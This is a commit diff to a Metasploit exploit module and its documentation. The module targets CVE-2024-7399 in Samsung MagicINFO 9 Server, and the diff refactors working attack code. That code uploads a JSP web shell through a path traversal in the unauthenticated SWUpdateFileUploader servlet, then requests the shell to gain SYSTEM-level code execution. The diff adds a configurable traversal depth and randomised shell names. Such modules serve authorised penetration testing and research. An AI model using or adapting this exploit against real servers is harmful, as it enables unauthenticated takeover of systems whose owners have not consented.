cleanup

h4x-x0r · h4x-x0r · commit e9c88b55f2dc · 2025-05-09T22:39:30.000+01:00
diff --git a/documentation/modules/exploit/windows/http/magicinfo_traversal.md b/documentation/modules/exploit/windows/http/magicinfo_traversal.md
@@ -33,6 +33,11 @@ msf6 exploit(windows/http/magicinfo_traversal) > exploit
 
 You should get a shell in the context of `NY AUTHORITY\SYSTEM`.
 
+## Options
+
+### DEPTH
+The traversal depth. The FILE path will be prepended with ../ * DEPTH.
+
 ## Scenarios
 
 Running the exploit against MagicINFO 9 21.1040.2 on Windows 10 should result in an output similar to the
diff --git a/modules/exploits/windows/http/magicinfo_traversal.rb b/modules/exploits/windows/http/magicinfo_traversal.rb
@@ -10,7 +10,7 @@ def initialize(info = {})
         info,
         'Name' => 'Samsung MagicINFO 9 Server Remote Code Execution (CVE-2024-7399)',
         'Description' => %q{
-          Remote Code Execution in Samsung MagicINFO 9 Server.
+          Remote Code Execution in Samsung MagicINFO 9 Server <= 21.1050.0.
           Remote code execution can be obtained by exploiting a path traversal vulnerability (CVE-2024-7399) in the SWUpdateFileUploader servlet, which can be queried by an unauthenticated user.
           By default, the application listens on TCP ports 7001 (HTTP) and 7002 (HTTPS) on all network interfaces and runs in the context of NT AUTHORITY\SYSTEM.
         },
@@ -24,12 +24,16 @@ def initialize(info = {})
           [ 'CVE', '2024-7399']
         ],
         'DisclosureDate' => '2025-04-30',
+        'DefaultOptions' => {
+          'RPORT' => 7002,
+          'SSL' => 'True'
+        },
         'Platform' => [ 'windows' ],
         'Arch' => [ ARCH_CMD ],
         'Targets' => [
           [
             'Java Server Page', {
-              'Platform' => %w[win linux unix],
+              'Platform' => %w[win],
               'Arch' => ARCH_JAVA
             }
           ]
@@ -45,8 +49,8 @@ def initialize(info = {})
 
     register_options(
       [
-        Opt::RPORT(7002),
-        OptString.new('TARGETURI', [ true, 'The URI for the MagicInfo web interface', '/MagicInfo'])
+        OptString.new('TARGETURI', [ true, 'The URI for the MagicInfo web interface', '/MagicInfo']),
+        OptInt.new('DEPTH', [ true, 'The traversal depth. The FILE path will be prepended with ../ * DEPTH', 6 ])
       ]
     )
   end
@@ -61,9 +65,7 @@ def check
 
     js_object = res.body.to_s[/window\.globalConfig\s*=\s*(\{.*\})/m, 1]
 
-    unless js_object
-      fail_with(Failure::UnexpectedReply, 'Could not extract globalConfig object from response')
-    end
+    fail_with(Failure::UnexpectedReply, 'Could not extract globalConfig object from response.') unless js_object
 
     json_safe = js_object.gsub(/'/, '"')
     json_safe.gsub!(/,(\s*[}\]])/, '\1')
@@ -72,45 +74,45 @@ def check
     full_version = data['magicInfoFrontEndVersion']
     version = full_version[/Server\s+([\d.]+)/, 1]
 
-    if Rex::Version.new(version) <= Rex::Version.new('21.1050.0')
+    return CheckCode::Unknown unless version
+
+    unless Rex::Version.new(version) > Rex::Version.new('21.1050.0')
       vprint_status("MagicINFO version detected: #{full_version}")
       return CheckCode::Appears
-    else
-      return CheckCode::Safe
     end
+
+    return CheckCode::Safe
   end
 
   def exploit
     execute_command(payload.encoded)
   end
 
-  def execute_command(_cmd)
+  def execute_command(cmd)
     print_status('Uploading shell...')
 
-    post_data = _cmd
+    shell = Rex::Text.rand_text_alpha(8..12)
+    traversal = '../' * datastore['DEPTH']
 
     res = send_request_cgi({
       'method' => 'POST',
       'ctype' => 'text/plain',
-      'data' => post_data,
-      'uri' => normalize_uri(target_uri.path, 'servlet/SWUpdateFileUploader?fileName=./../../../../../../server/shell2.jsp&deviceType=abc&deviceModelName=test&swVer=123')
-
+      'data' => cmd,
+      'uri' => normalize_uri(target_uri.path, 'servlet', "SWUpdateFileUploader?fileName=./#{traversal}server/#{shell}.jsp")
     })
 
     if res && res.code == 200
       print_good('Upload successful.')
       res1 = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path, 'shell2.jsp'),
+        'uri' => normalize_uri(target_uri.path, "#{shell}.jsp"),
         'method' => 'GET'
       })
-      if res1 && res1.code == 200
-        print_status('Payload executed!')
-      else
-        fail_with(Failure::PayloadFailed, 'Failed to execute the payload.')
-      end
+
+      fail_with(Failure::PayloadFailed, 'Failed to execute the payload.') unless res1 && res1.code == 200
+      print_status('Payload executed!')
+
     else
       fail_with(Failure::UnexpectedReply, 'Failed to upload the payload.')
     end
   end
-
 end
